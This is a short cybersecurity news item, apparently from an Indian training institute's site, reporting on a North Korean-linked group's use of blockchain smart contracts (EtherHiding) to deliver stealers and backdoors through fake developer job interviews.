(An Autonomous Body Recognized by Ministry of Commerce & Industry, Government of India)
Competency based placement focussed Education I Training I Research I Consultancy
EtherHiding Used by North Korean Group to Deliver Modular Malware
North Korean-linked actors tied to UNC5342 have adopted EtherHiding to distribute malware and steal cryptocurrency, marking a novel state-sponsored use of blockchain stagers. In the Contagious Interview campaign, operators contact developers on LinkedIn, move conversations to Telegram or Discord, and trick targets into running code purportedly for assessments. The chain starts with malicious npm packages that drop BeaverTail, a JavaScript stealer that harvests wallets, browser data and credentials. A downloader named JADESNOW queries malicious smart contracts on BSC or Ethereum to retrieve InvisibleFerret, a JavaScript backdoor that enables remote control and long-term data exfiltration. Attackers also install a portable Python runtime to run an additional stealer fetched from another contract. EtherHiding embeds payloads in updatable smart contracts, providing resilience and anonymity while costing minimal gas. Google TAG’s attribution to UNC5342 shows nation-state groups are weaponizing decentralized platforms to create takedown‑resistant, modular malware pipelines. Defenders must monitor blockchain-based artifacts and respond.
21-10-2025
đź“° Recent News
- Microsoft Impersonation Scam Uses Fake Support Alerts to Steal Credentials
- Windows Rust Kernel Bug Causes System Crashes Despite Memory Safety
- TikTok Malware Campaign Tricks Users with Fake Software Activations
- Operation Zero Disco: Cisco SNMP Flaw Exploited to Install Linux Rootkits
- EtherHiding Used by North Korean Group to Deliver Modular Malware